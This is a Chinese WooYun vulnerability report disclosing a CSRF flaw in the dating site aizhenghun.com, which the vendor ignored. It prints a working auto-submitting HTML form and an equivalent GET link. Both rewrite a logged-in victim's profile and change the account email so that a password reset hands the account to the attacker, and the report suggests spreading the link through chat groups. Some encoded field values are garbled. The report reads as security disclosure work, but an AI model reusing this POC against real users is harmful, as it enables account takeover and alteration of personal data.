当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127561

漏洞标题:爱征婚CSRF漏洞导致个人信息被篡改

相关厂商:aizhenghun.com

漏洞作者: 路人甲

提交时间:2015-07-20 15:49

修复时间:2015-07-25 15:50

公开时间:2015-07-25 15:50

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

爱征婚CSRF漏洞导致个人信息被篡改,可通过邮箱重置他人账号
小厂商好痛苦

详细说明:

http://www.aizhenghun.com


POC
<html>
<body>
<form action="http://www.aizhenghun.com/register_Upd.asp" method="POST">
<input type="hidden" name="steps" value="1" />
<input type="hidden" name="nickname" value="123" />
<input type="hidden" name="email" value="service999&#64;qq&#46;com" />
<input type="hidden" name="marriage1" value="1" />
<input type="hidden" name="height" value="175" />
<input type="hidden" name="salary" value="9" />
<input type="hidden" name="year" value="1996" />
<input type="hidden" name="month" value="1" />
<input type="hidden" name="days" value="2" />
<input type="hidden" name="province" value="10102000" />
<input type="hidden" name="city" value="&#45;1" />
<input type="hidden" name="education1" value="3" />
<input type="hidden" name="children1" value="&#45;1" />
<input type="hidden" name="house" value="&#45;1" />
<input type="hidden" name="age1" value="19" />
<input type="hidden" name="age2" value="25" />
<input type="hidden" name="workProvince" value="&#45;1" />
<input type="hidden" name="workCity" value="&#45;1" />
<input type="hidden" name="marriage2" value="&#45;1" />
<input type="hidden" name="education2" value="&#45;1" />
<input type="hidden" name="salary1" value="&#45;1" />
<input type="hidden" name="children2" value="&#45;1" />
<input type="hidden" name="height1" value="&#45;1" />
<input type="hidden" name="height2" value="&#45;1" />
<input type="hidden" name="hasphoto" value="1" />
<input type="hidden" name="nature2" value="&#45;1" />
<input type="hidden" name="body2" value="&#45;1" />
<input type="hidden" name="weight1" value="&#45;1" />
<input type="hidden" name="weight2" value="&#45;1" />
<input type="hidden" name="occupation2" value="&#45;1" />
<input type="hidden" name="stock2" value="&#45;1" />
<input type="hidden" name="wantchildren2" value="&#45;1" />
<input type="hidden" name="hometownProvince2" value="&#45;1" />
<input type="hidden" name="hometownCity2" value="&#45;1" />
<input type="hidden" name="issmoking" value="&#45;1" />
<input type="hidden" name="isdrinking" value="&#45;1" />
<input type="hidden" name="introduce" value="�#162;&#180;蟮娜�#180;笕�#182;&#165;&#182;&#165;&#176;&#180;�#177;&#180;�#180;�#176;&#161;飒飒&#176;&#161;&#176;&#161;&#176;&#161;实&#180;蚴�#180;蟮�#182;� />
<input type="hidden" name="hobby" value="" />
<input type="hidden" name="pastime" value="" />
<input type="hidden" name="live" value="" />
<input type="hidden" name="nature" value="" />
<input type="hidden" name="issubmit" value="提&#189;&#187;" />
<input type="hidden" name="actio" value="1" />
<script>
document.forms[0].submit();
</script>
</form>
</body>
</html>

漏洞证明:

发现昵称 123 这些不可以修改

1.jpg


但是利用我们构造好的POC, 可以修改呢, 昵称:1 都可以呢

2.jpg


3.jpg


可以通过邮箱找回密码, 这里就不演示了
利用方法,加群发给用户。
又或者
http://www.aizhenghun.com/register_Upd.asp?steps=1&nickname=%B0%A1%CA%B5%B4%F2%CA%B5%B4%F3%B5%C4&email=service%40qq.com&marriage1=1&height=175&salary=9&year=1996&month=1&days=2&province=10102000&city=-1&education1=3&children1=-1&house=-1&age1=19&age2=25&workProvince=-1&workCity=-1&marriage2=-1&education2=-1&salary1=-1&children2=-1&height1=-1&height2=-1&hasphoto=1&nature2=-1&body2=-1&weight1=-1&weight2=-1&occupation2=-1&stock2=-1&wantchildren2=-1&hometownProvince2=-1&hometownCity2=-1&issmoking=-1&isdrinking=-1&introduce=%EF%BF%3F%23162%3B%26%23180%3B%E8%9F%AE%E5%26%2359330%3B%EF%BF%3F%23180%3B%E7%AC%95%EF%BF%BD%23182%3B%26%23165%3B%26%23182%3B%26%23165%3B%A1%E3%26%23180%3B%EF%BF%3F%23177%3B%26%23180%3B%EF%BF%3F%23180%3B%EF%BF%3F%23176%3B%26%23161%3B%E9%A3%92%E9%A3%92%A1%E3%26%23161%3B%A1%E3%26%23161%3B%A1%E3%26%23161%3B%E5%AE%3F%26%23180%3B%E8%9A%B4%EF%BF%BD%23180%3B%E8%9F%AE%EF%BF%BD%23182%3B%EF%BF%3F+%2F%3E%0D%0A++++++%3Cinput+type%3D&hobby=&pastime=&live=&nature=&issubmit=%CC%E1%BD%BB&actio=1
链接内容改改, 复制粘贴又是可以
我觉得唯一好玩的地方就是昵称了, 又空白昵称

4.jpg

修复方案:

厂商能大方点吗, Gift 有吗
挖洞不易,帮助厂商是我的责任

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-25 15:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无